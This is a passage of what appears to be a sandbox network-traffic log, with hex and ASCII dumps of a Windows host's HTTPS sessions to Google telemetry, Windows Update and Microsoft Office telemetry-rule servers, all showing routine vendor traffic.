2024-11-15 13:09:18 UTC	1378	IN	Data Raw: 2b 39 32 31 36 7d 7d 7d 29 3b 0a 6e 61 28 22 53 74 72 69 6e 67 2e 66 72 6f 6d 43 6f 64 65 50 6f 69 6e 74 22 2c 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 3f 61 3a 66 75 6e 63 74 69 6f 6e 28 62 29 7b 66 6f 72 28 76 61 72 20 63 3d 22 22 2c 64 3d 30 3b 64 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 64 2b 2b 29 7b 76 61 72 20 65 3d 4e 75 6d 62 65 72 28 61 72 67 75 6d 65 6e 74 73 5b 64 5d 29 3b 69 66 28 65 3c 30 7c 7c 65 3e 31 31 31 34 31 31 31 7c 7c 65 21 3d 3d 4d 61 74 68 2e 66 6c 6f 6f 72 28 65 29 29 74 68 72 6f 77 20 6e 65 77 20 52 61 6e 67 65 45 72 72 6f 72 28 22 69 6e 76 61 6c 69 64 5f 63 6f 64 65 5f 70 6f 69 6e 74 20 22 2b 65 29 3b 65 3c 3d 36 35 35 33 35 3f 63 2b 3d 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 Data Ascii: +9216}}});na("String.fromCodePoint",function(a){return a?a:function(b){for(var c="",d=0;d<arguments.length;d++){var e=Number(arguments[d]);if(e<0\|\|e>1114111\|\|e!==Math.floor(e))throw new RangeError("invalid_code_point "+e);e<=65535?c+=String.fromCharCode(

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49749	142.250.186.110	443	7228	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:09:19 UTC	726	OUT	POST /log?format=json&hasfast=true HTTP/1.1 Host: play.google.com Connection: keep-alive Content-Length: 905 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-platform: "Windows" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded;charset=UTF-8 Accept: / Origin: chrome-untrusted://new-tab-page X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiSocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUX Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-11-15 13:09:19 UTC	905	OUT	Data Raw: 5b 5b 31 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 5b 5b 22 47 6f 6f 67 6c 65 20 43 68 72 6f 6d 65 22 2c 22 31 31 37 22 5d 2c 5b 22 4e 6f 74 3b 41 3d 42 72 61 6e 64 22 2c 22 38 22 5d 2c 5b 22 43 68 72 6f 6d 69 75 6d 22 2c 22 31 31 37 22 5d 5d 2c 30 2c 22 57 69 6e 64 6f 77 73 22 2c 22 31 30 2e 30 2e 30 22 2c 22 78 38 36 22 2c 22 22 2c 22 31 31 37 2e 30 2e 35 39 33 38 2e 31 33 32 22 5d 2c 5b 31 2c 30 2c 30 2c 30 2c 30 5d 5d 5d 2c 33 37 33 2c 5b 5b 22 31 37 33 31 36 37 36 31 35 36 38 36 37 22 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c Data Ascii: [[1,null,null,null,null,null,null,null,null,null,[null,null,null,null,null,null,null,null,[[["Google Chrome","117"],["Not;A=Brand","8"],["Chromium","117"]],0,"Windows","10.0.0","x86","","117.0.5938.132"],[1,0,0,0,0]]],373,[["1731676156867",null,null,null,
2024-11-15 13:09:19 UTC	941	IN	HTTP/1.1 200 OK Access-Control-Allow-Origin: chrome-untrusted://new-tab-page Cross-Origin-Resource-Policy: cross-origin Access-Control-Allow-Credentials: true Access-Control-Allow-Headers: X-Playlog-Web Set-Cookie: NID=519=wo_AfBc0tIgSimZe5d866Xw3z2o8vRzcy2F4a_RMPB_KpajhloF-1LliTlEqbEpsOffa75Py__jQstwt1_GvDeqqoAj4mZU5XqdEibhFN0NSIj8ZLmVcYma1mOAdOOXme1OvBjc2zeGBVxo39Y0GOgT8_gqau5m-4n1zhfkUueuvNQUCj9PVZYQ; expires=Sat, 17-May-2025 13:09:19 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Content-Type: text/plain; charset=UTF-8 Date: Fri, 15 Nov 2024 13:09:19 GMT Server: Playlog X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Expires: Fri, 15 Nov 2024 13:09:19 GMT Cache-Control: private Connection: close Transfer-Encoding: chunked
2024-11-15 13:09:19 UTC	137	IN	Data Raw: 38 33 0d 0a 5b 22 2d 31 22 2c 6e 75 6c 6c 2c 5b 5b 5b 22 41 4e 44 52 4f 49 44 5f 42 41 43 4b 55 50 22 2c 30 5d 2c 5b 22 42 41 54 54 45 52 59 5f 53 54 41 54 53 22 2c 30 5d 2c 5b 22 53 4d 41 52 54 5f 53 45 54 55 50 22 2c 30 5d 2c 5b 22 54 52 4f 4e 22 2c 30 5d 5d 2c 2d 33 33 33 34 37 33 37 35 39 34 30 32 34 39 37 31 32 32 35 5d 2c 5b 5d 2c 7b 22 31 37 35 32 33 37 33 37 35 22 3a 5b 31 30 30 30 30 5d 7d 5d 0d 0a Data Ascii: 83["-1",null,[[["ANDROID_BACKUP",0],["BATTERY_STATS",0],["SMART_SETUP",0],["TRON",0]],-3334737594024971225],[],{"175237375":[10000]}]
2024-11-15 13:09:19 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49755	52.149.20.212	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:09:23 UTC	306	OUT	GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=B9aATLYBnkH1xut&MD=NBebN5mO HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-11-15 13:09:23 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880" MS-CorrelationId: 9c15eeca-f3a9-4968-87f8-745b92d00b4a MS-RequestId: 0f2f1a21-f6cc-4a99-b0e8-e897f7840e72 MS-CV: FOiOtiiU1EuTx8+D.0 X-Microsoft-SLSClientCache: 2880 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Fri, 15 Nov 2024 13:09:22 GMT Connection: close Content-Length: 24490
2024-11-15 13:09:23 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58 Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
2024-11-15 13:09:23 UTC	8666	IN	Data Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31 Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1

Session ID	Source IP	Source Port	Destination IP	Destination Port
7	192.168.2.4	49762	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:09:57 UTC	195	OUT	GET /rules/other-Win32-v19.bundle HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:09:57 UTC	471	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:09:57 GMT Content-Type: text/plain Content-Length: 218853 Connection: close Vary: Accept-Encoding Cache-Control: public Last-Modified: Thu, 14 Nov 2024 16:27:56 GMT ETag: "0x8DD04C94BD1CD28" x-ms-request-id: ffb18316-701e-0098-4bed-36395f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T130957Z-164f84587bfs5tz9hC1DFW9a3w00000001gg0000000006x3 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-15 13:09:57 UTC	15913	IN	Data Raw: 31 30 30 30 76 35 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 22 20 56 3d 22 35 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 52 75 6c 65 45 72 72 6f 72 73 41 67 67 72 65 67 61 74 65 64 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 53 3d 22 37 30 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20 Data Ascii: 1000v5+<?xml version="1.0" encoding="utf-8"?><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU"
2024-11-15 13:09:57 UTC	16384	IN	Data Raw: 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 42 22 20 49 3d 22 35 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20 Data Ascii: /> </R> </O> </R> </O> </C> <C T="B" I="5" O="false"> <O T="AND"> <L> <O T="GE"> <L> <S T="1" F="0" /> </L> <R> <V V="400" T="I32" />
2024-11-15 13:09:57 UTC	16384	IN	Data Raw: 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 38 32 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 6f 6e 74 61 63 74 43 61 72 64 50 72 6f 70 65 72 74 69 65 73 43 6f 75 6e 74 73 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31 33 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 68 75 74 64 6f 77 6e 22 20 2f 3e 0d Data Ascii: .0" encoding="utf-8"?><R Id="10820" V="3" DC="SM" EN="Office.Outlook.Desktop.ContactCardPropertiesCounts" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryShutdown" />
2024-11-15 13:09:57 UTC	16384	IN	Data Raw: 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 39 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 41 67 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 30 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 31 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 46 69 6c 65 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 38 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 Data Ascii: </C> <C T="U32" I="9" O="true" N="Purged_Age"> <S T="4" F="Count" /> </C> <C T="U32" I="10" O="true" N="Purged_Count"> <S T="5" F="Count" /> </C> <C T="U32" I="11" O="true" N="File_Count"> <S T="8" F="Count" /> </C>
2024-11-15 13:09:57 UTC	16384	IN	Data Raw: 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 4d 61 6e 61 67 65 72 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 52 65 73 75 6c 74 5f 56 61 6c 69 64 50 65 72 73 6f 6e 61 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 32 22 20 2f 3e 0d 0a 20 Data Ascii: <S T="10" /> </C> </C> <C T="U32" I="1" O="false" N="Count_CreateCard_ValidManager_False"> <C> <S T="11" /> </C> </C> <C T="U32" I="2" O="false" N="Count_CreateResult_ValidPersona_False"> <C> <S T="12" />
2024-11-15 13:09:58 UTC	16384	IN	Data Raw: 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 57 61 73 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6c 65 61 6e 75 70 4d 73 6f 50 65 72 73 6f 6e 61 5f 49 4d 73 6f 50 65 72 73 6f 6e Data Ascii: Paint_IMsoPersona_WasNull_Count"> <C> <S T="32" /> </C> </C> <C T="U32" I="20" O="false" N="Paint_IMsoPersona_Null_Count"> <C> <S T="33" /> </C> </C> <C T="U32" I="21" O="false" N="CleanupMsoPersona_IMsoPerson
2024-11-15 13:09:58 UTC	16384	IN	Data Raw: 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 32 30 30 22 20 54 3d 22 49 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22 Data Ascii: <R> <V V="200" T="I64" /> </R> </O> </L> <R> <O T="LT"> <L> <S T="3" F="RetrievalMilliseconds" /> </L> <R> <V V="400"
2024-11-15 13:09:58 UTC	16384	IN	Data Raw: 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 53 75 63 63 65 73 73 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 46 61 69 6c 65 64 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 Data Ascii: </S> <C T="U32" I="0" O="false" N="Ocom2IUCOfficeIntegrationFirstCallSuccessCount"> <C> <S T="9" /> </C> </C> <C T="U32" I="1" O="false" N="Ocom2IUCOfficeIntegrationFirstCallFailedCount"> <C> <S T="10" /> </C
2024-11-15 13:09:58 UTC	16384	IN	Data Raw: 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 54 65 6e 61 6e 74 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 55 73 65 72 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 66 61 6c 73 65 22 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 Data Ascii: L> <S T="3" F="Tenant enabled" /> </L> <R> <O T="EQ"> <L> <S T="3" F="User enabled" /> </L> <R> <V V="false" T="B" /> </R>
2024-11-15 13:09:58 UTC	16384	IN	Data Raw: 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 34 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 Data Ascii: us" /> </L> <R> <V V="404" T="U32" /> </R> </O> </F> <F T="7"> <O T="AND"> <L> <O T="GE"> <L> <S T="2" F="HttpStatus" /> </L>

Session ID	Source IP	Source Port	Destination IP	Destination Port
8	192.168.2.4	49766	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:09:59 UTC	192	OUT	GET /rules/rule120609v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:09:59 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:09:59 GMT Content-Type: text/xml Content-Length: 408 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT ETag: "0x8DC582BB56D3AFB" x-ms-request-id: 6c84f393-101e-007a-65a5-36047e000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T130959Z-16547b76f7ffx24hhC1DFW9px400000000t000000000fdvd x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-15 13:09:59 UTC	408	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 44 64 5d 5b 45 65 5d 5b 4c 6c 5d 5b 4c 6c 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port
9	192.168.2.4	49764	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-15 13:09:59 UTC	192	OUT	GET /rules/rule224902v2s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-15 13:09:59 UTC	470	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 13:09:59 GMT Content-Type: text/xml Content-Length: 450 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT ETag: "0x8DC582BD4C869AE" x-ms-request-id: 18edf7b2-e01e-0003-11a0-340fa8000000 x-ms-version: 2018-03-28 x-azure-ref: 20241115T130959Z-164f84587bf5rpzqhC1DFWmra800000001ag000000008cmp x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
